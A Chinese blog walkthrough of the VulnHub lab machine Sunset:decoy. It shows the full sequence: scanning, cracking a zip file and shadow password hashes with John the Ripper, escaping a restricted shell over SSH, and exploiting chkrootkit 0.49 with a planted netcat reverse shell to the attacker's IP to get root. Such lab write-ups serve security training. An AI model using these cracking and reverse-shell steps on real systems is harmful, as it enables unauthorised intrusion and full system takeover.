Sunset:decoy 打靶渗透

最新推荐文章于 2024-08-05 00:31:24 发布
最新推荐文章于 2024-08-05 00:31:24 发布
阅读量615 收藏 14
点赞数 24
文章标签: 网络 web安全 网络安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140857229
版权

一、信息收集

1、查看靶机的mac地址:

2、查看靶机的ip地址:

nmap 192.168.7.0/24

3、扫描靶机开放的端口:

nmap -p- 192.168.7.202

4、查看靶机的80端口,只看到有一个zip文件:

5、进行目录扫描,没有有用的信息:

dirsearch -u "http://192.168.7.202"

6、下载zip文件,发现解压需要密码:

7、看到压缩包里面有shadow文件,如果能爆破出SSH密码,就能登录SSH服务:

使用命令zip2john save.zip > save.zip.hash

john save.zip.hash爆破压缩包的解压密码

获得save.zip的解压密码:manuel

8、解压并查看shadow文件的内容,发现root用户和296640a3b825115a47b68fc44501c828用户允许登录:

9、使用命令sudo john ./etc/shadow --format=crypt爆破./etc/shadow文件中的SSH密码:

获得用户296640a3b825115a47b68fc44501c828的SSH密码server

10、使用账号密码进行ssh连接,连接成功但是用户权限很低:

二、提权

1、使用sudo -l、find / -perm -u=s -ls 2>/dev/null查看,发现没有办法使用sudo和suid提权:

2、使用ls -al命令发现很多文件读不了,可以读取的文件,发现没有cat命令:

3、发现ssh命令参数-t "bash --noprofile"可以强制分配伪终端,从而解决命令受限问题:

ssh 296640a3b825115a47b68fc44501c828@172.16.7.202 -t "bash --noprofile"

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

4、使用sudo -l查看,依旧没有sudo权限:

5、使用命令查看是否可以使用suid提权的文件,发现没有文件可以提权:

find / -perm -u=s -ls 2>/dev/null

6、使用ls -al查看文件,曾经执行过解压chkrootkit-0.49.tar.gz文件的命令,也就是系统可能使用0.49版本的chkrootkit程序:

7、0.49版本的chkrootkit程序存在本地提权漏洞,使用命令查询漏洞情况:

searchsploit chkrootkit

8、将前面发现的EXP复制到当前目录:

searchsploit -m 33899

9、使用语句进行反弹shell:

echo nc -nv 192.168.7.200 4444 -e /bin/bash > /tmp/update

chmod +x /tmp/update

/usr/bin/touch /dev/shm/STTY5246

honeypot.decoy

5

10、kali开启监听:

nc -lvvp 4444

11、查看反弹情况,成功反弹拿到root权限:

搬砖小星
关注
  • 24
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1152
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1021
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
【vulnhub】Sunset:decoy 打靶渗透
最新发布
weixin_62162207的博客
08-05 209
Sunset:decoy 打靶训练
vulnhub sunset: decoy
箭雨镜屋
03-27 703
nmap扫描 ---- fcrackzip破解save.zip密码 ---- john暴力破解shadow中普通用户密码 ---- rbash绕过 ---- 发现并执行chkrootkit ---- 利用chkrootkit 0.49的漏洞提权
vulnhub-sunset: decoy-wp
yutianovo的博客
07-14 380
靶机信息 blog:http://blog.yutian233.xyz/ Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware https://www.vulnhub.com/entry/sunset-decoy,505/
vulhub-sunset:decoy
2201_75378806的博客
05-09 653
常规端口扫描,有22,80。
vulnhub靶机-sunsetdecoy
臭nana的博客
07-20 1511
1、找到靶机ip:192.168.0.129 nmap -sn 192.168.0.0/24 2、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态 root@kali:~# nmap -p- -A 192.168.0.129 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.129 Host is up (0.0057s latency). Not shown: 65528 closed p
SUNSET: MIDNIGHT靶机
logan_logan的博客
07-22 399
1.浏览器输入地址打开网页;
VulnHub靶场之sunset:noontide
A_dmin的博客
09-30 1119
VulnHub靶场之sunset:noontide nmap扫描主机存活: 扫描端口,开放三个端口: emmm,irc是什么服务啊,就很迷,,百度搜索一波,,,好像是一个类似于网络聊天啥的东西 不太会啊,也没玩过这个,,,,直接searchsploit搜索一下版本好像是unreal: 还真有!使用第三个,,,,先下载到本地 使用msfvenom生成payload: 复制如上payload,打开13853.pl更改payload,一开始有五行直接删除其余四行,更改第一行: 然后保存运行: 监听4
sunset::sunrise:获取日落时间
04-30
:cloud: 安装# Clone this repositorygit clone https://github.com/Bloggify/sunset# Install the dependenciescd sunset && npm i# Start the app in dev modenpm run start:dev :red_question_mark: 得到帮助...
sunset:日落-Ghost博客主题
04-29
版权和许可版权所有(c)2013-2015 Sunset Foundation-根据MIT许可证发行。 特此免费授予获得此软件和相关文档文件(“软件”)副本的任何人无限制地处理软件的权利,包括但不限于使用,复制,修改,合并的权利,...
Sunset:日落是您有史以来最好的Discord Bot
05-01
如果您想知道如何自己运行Sunset,请访问因此,该机器人在崩溃或关闭时可以自行重新启动,您可能需要安装PM2这样的流程管理器npm install pm2 -g安装其他在尝试运行Sunset之前,您应该键入install package.json详细...
sundown-sunset:用于计算日落和日落时间的简单API
02-18
"sundown-sunset"是一个简洁的API,专为开发者设计,用于快速获取特定位置的日落和日出时间。这个API简化了天文学计算,使得开发者无需深入了解相关知识就能在他们的应用程序中集成这一功能。 首先,让我们了解一下...
ConcreteStructs.jl::love_hotel::house::cityscape_at_dusk::hotel::sunset::bank:
02-17
ConcreteStructs.jl ConcreteStructs.jl导出宏@concrete ,该宏可用于使非混凝土结构混凝土,而无需添加类型参数的样板。 using ConcreteStructs @concrete struct AB a b end julia> ab = AB("hi", 1+im) ...
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 562
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 470
Vulnhub系列Connect-The-Dots靶场做题记录
计算机网络—电路、分组、报文交换—图文详解
喻师傅的学习笔记
07-31 775
计算机网络—三种交换方式图文详解
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 1077
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
calculate_sunset
06-11
`calculate_sunset`函数和`calculate_sunrise`函数类似,只不过它用于计算日落时间。以下是使用NOAA的Solar Calculator库计算日落时间的示例代码: ``` #include <stdio.h> #include "solar_calculator.h" int main() { double lat = 37.7749; // 纬度 double lon = -122.4194; // 经度 int year = 2021; // 年份 int month = 8; // 月份 int day = 25; // 日期 int tz = -7; // 时区,如美国西部时区为-7 double sunset = calculate_sunset(lat, lon, year, month, day, tz); printf("日落时间:%.2f\n", sunset); return 0; } ``` 同样地,`solar_calculator.h`头文件包含了计算日出日落时间的函数,`lat`和`lon`分别表示纬度和经度,`year`、`month`、`day`分别表示年、月、日,`tz`表示时区。函数`calculate_sunset`用于计算日落时间,返回值为日落的UTC时间(以小时为单位)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值